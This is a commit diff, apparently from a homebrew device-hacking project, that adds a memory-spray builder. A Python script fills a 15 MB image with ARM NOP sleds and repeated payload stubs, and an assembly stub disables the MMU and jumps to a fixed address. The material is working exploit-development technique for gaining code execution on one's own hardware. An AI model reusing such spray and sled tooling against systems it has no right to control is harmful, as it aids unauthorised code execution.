mirror of
https://github.com/brain-hackers/lab
synced 2024-12-22 12:10:04 +09:00
Implement memory spray
This commit is contained in:
parent
60d409f947
commit
7372479efc
12
x1/Makefile
12
x1/Makefile
@ -7,7 +7,7 @@ all: return.bin mrc.bin c/main.bin
|
||||
|
||||
.PHONY:
|
||||
clean:
|
||||
@rm -f *.bin */*.bin
|
||||
@rm -f *.bin spray/*.bin c/*.bin
|
||||
|
||||
%.bin: %.S
|
||||
@$(AS) $<
|
||||
@ -17,4 +17,12 @@ clean:
|
||||
c/main.bin:
|
||||
@$(CC) -nostdlib -static -fPIC -mcpu=cortex-a7 c/start.S c/main.c
|
||||
@./extract.py a.out $@
|
||||
#@rm -f a.out
|
||||
@rm -f a.out
|
||||
|
||||
spray/main.bin:
|
||||
@$(AS) spray/top.S
|
||||
@./extract.py -p a.out spray/top.bin
|
||||
@$(AS) spray/bottom.S
|
||||
@./extract.py -p a.out spray/bottom.bin
|
||||
@./append_nop.py 15728640 spray/top.bin spray/bottom.bin spray/main.bin
|
||||
@rm -f a.out
|
||||
|
24
x1/append_nop.py
Executable file
24
x1/append_nop.py
Executable file
@ -0,0 +1,24 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import sys
|
||||
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 5:
|
||||
print(f'Usage: {sys.argv[0]} N top.bin bottom.bin out.bin', file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
with open(sys.argv[2], 'rb') as topf, open(sys.argv[3], 'rb') as bottomf, open(sys.argv[4], 'wb') as out:
|
||||
top, bottom = topf.read(), bottomf.read()
|
||||
out.write(top)
|
||||
for i in range((1024 * 64 - len(top) - len(bottom)) // 4):
|
||||
out.write(b'\x00\x00\xa0\xe1')
|
||||
out.write(bottom)
|
||||
|
||||
for i in range(1024 * 1024 * 15 // (1024 * 64) - 1):
|
||||
for i in range((1024 * 64 - len(bottom)) // 4):
|
||||
out.write(b'\x00\x00\xa0\xe1')
|
||||
out.write(bottom)
|
||||
|
||||
|
||||
main()
|
@ -9,7 +9,7 @@ def main():
|
||||
print(f'Usage: {sys.argv[0]} in.elf out.bin')
|
||||
sys.exit(1)
|
||||
|
||||
with open(sys.argv[1], 'rb') as f:
|
||||
with open(sys.argv[-2], 'rb') as f:
|
||||
extract(ELFFile(f))
|
||||
|
||||
|
||||
@ -19,7 +19,11 @@ def extract(elf):
|
||||
print('Input ELF has no .text section', file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
with open(sys.argv[2], 'wb') as f:
|
||||
with open(sys.argv[-1], 'wb') as f:
|
||||
if '-p' in sys.argv:
|
||||
print(f'Pure .text mode is enabled')
|
||||
f.write(text.data())
|
||||
else:
|
||||
elf.stream.seek(0)
|
||||
elf.stream.read(text.header.sh_offset)
|
||||
f.write(elf.stream.read())
|
||||
|
9
x1/spray/bottom.S
Normal file
9
x1/spray/bottom.S
Normal file
@ -0,0 +1,9 @@
|
||||
.text
|
||||
.align 2
|
||||
.global _start
|
||||
|
||||
_start:
|
||||
loop:
|
||||
b loop
|
||||
ldr r0, =0x00000000
|
||||
mov pc, r0
|
16
x1/spray/top.S
Normal file
16
x1/spray/top.S
Normal file
@ -0,0 +1,16 @@
|
||||
.text
|
||||
.align 2
|
||||
.global _start
|
||||
|
||||
_start:
|
||||
mov r9, #0
|
||||
ldr r0, =0x67800000
|
||||
|
||||
mrc p15, 0, r10, c1, c0, 0
|
||||
bic r10, r10, #1 @ disable MMU and dcache
|
||||
@bic r10, r10, #4096 @ disable icache
|
||||
mcr p15, 0, r10, c1, c0, 0 // write ctrl regs
|
||||
#mcr p15, 0, r9, c7, c7, 0 // invalidate cache
|
||||
#mcr p15, 0, r9, c8, c7, 0 // invalidate TLB
|
||||
mov pc, r0
|
||||
|
Loading…
Reference in New Issue
Block a user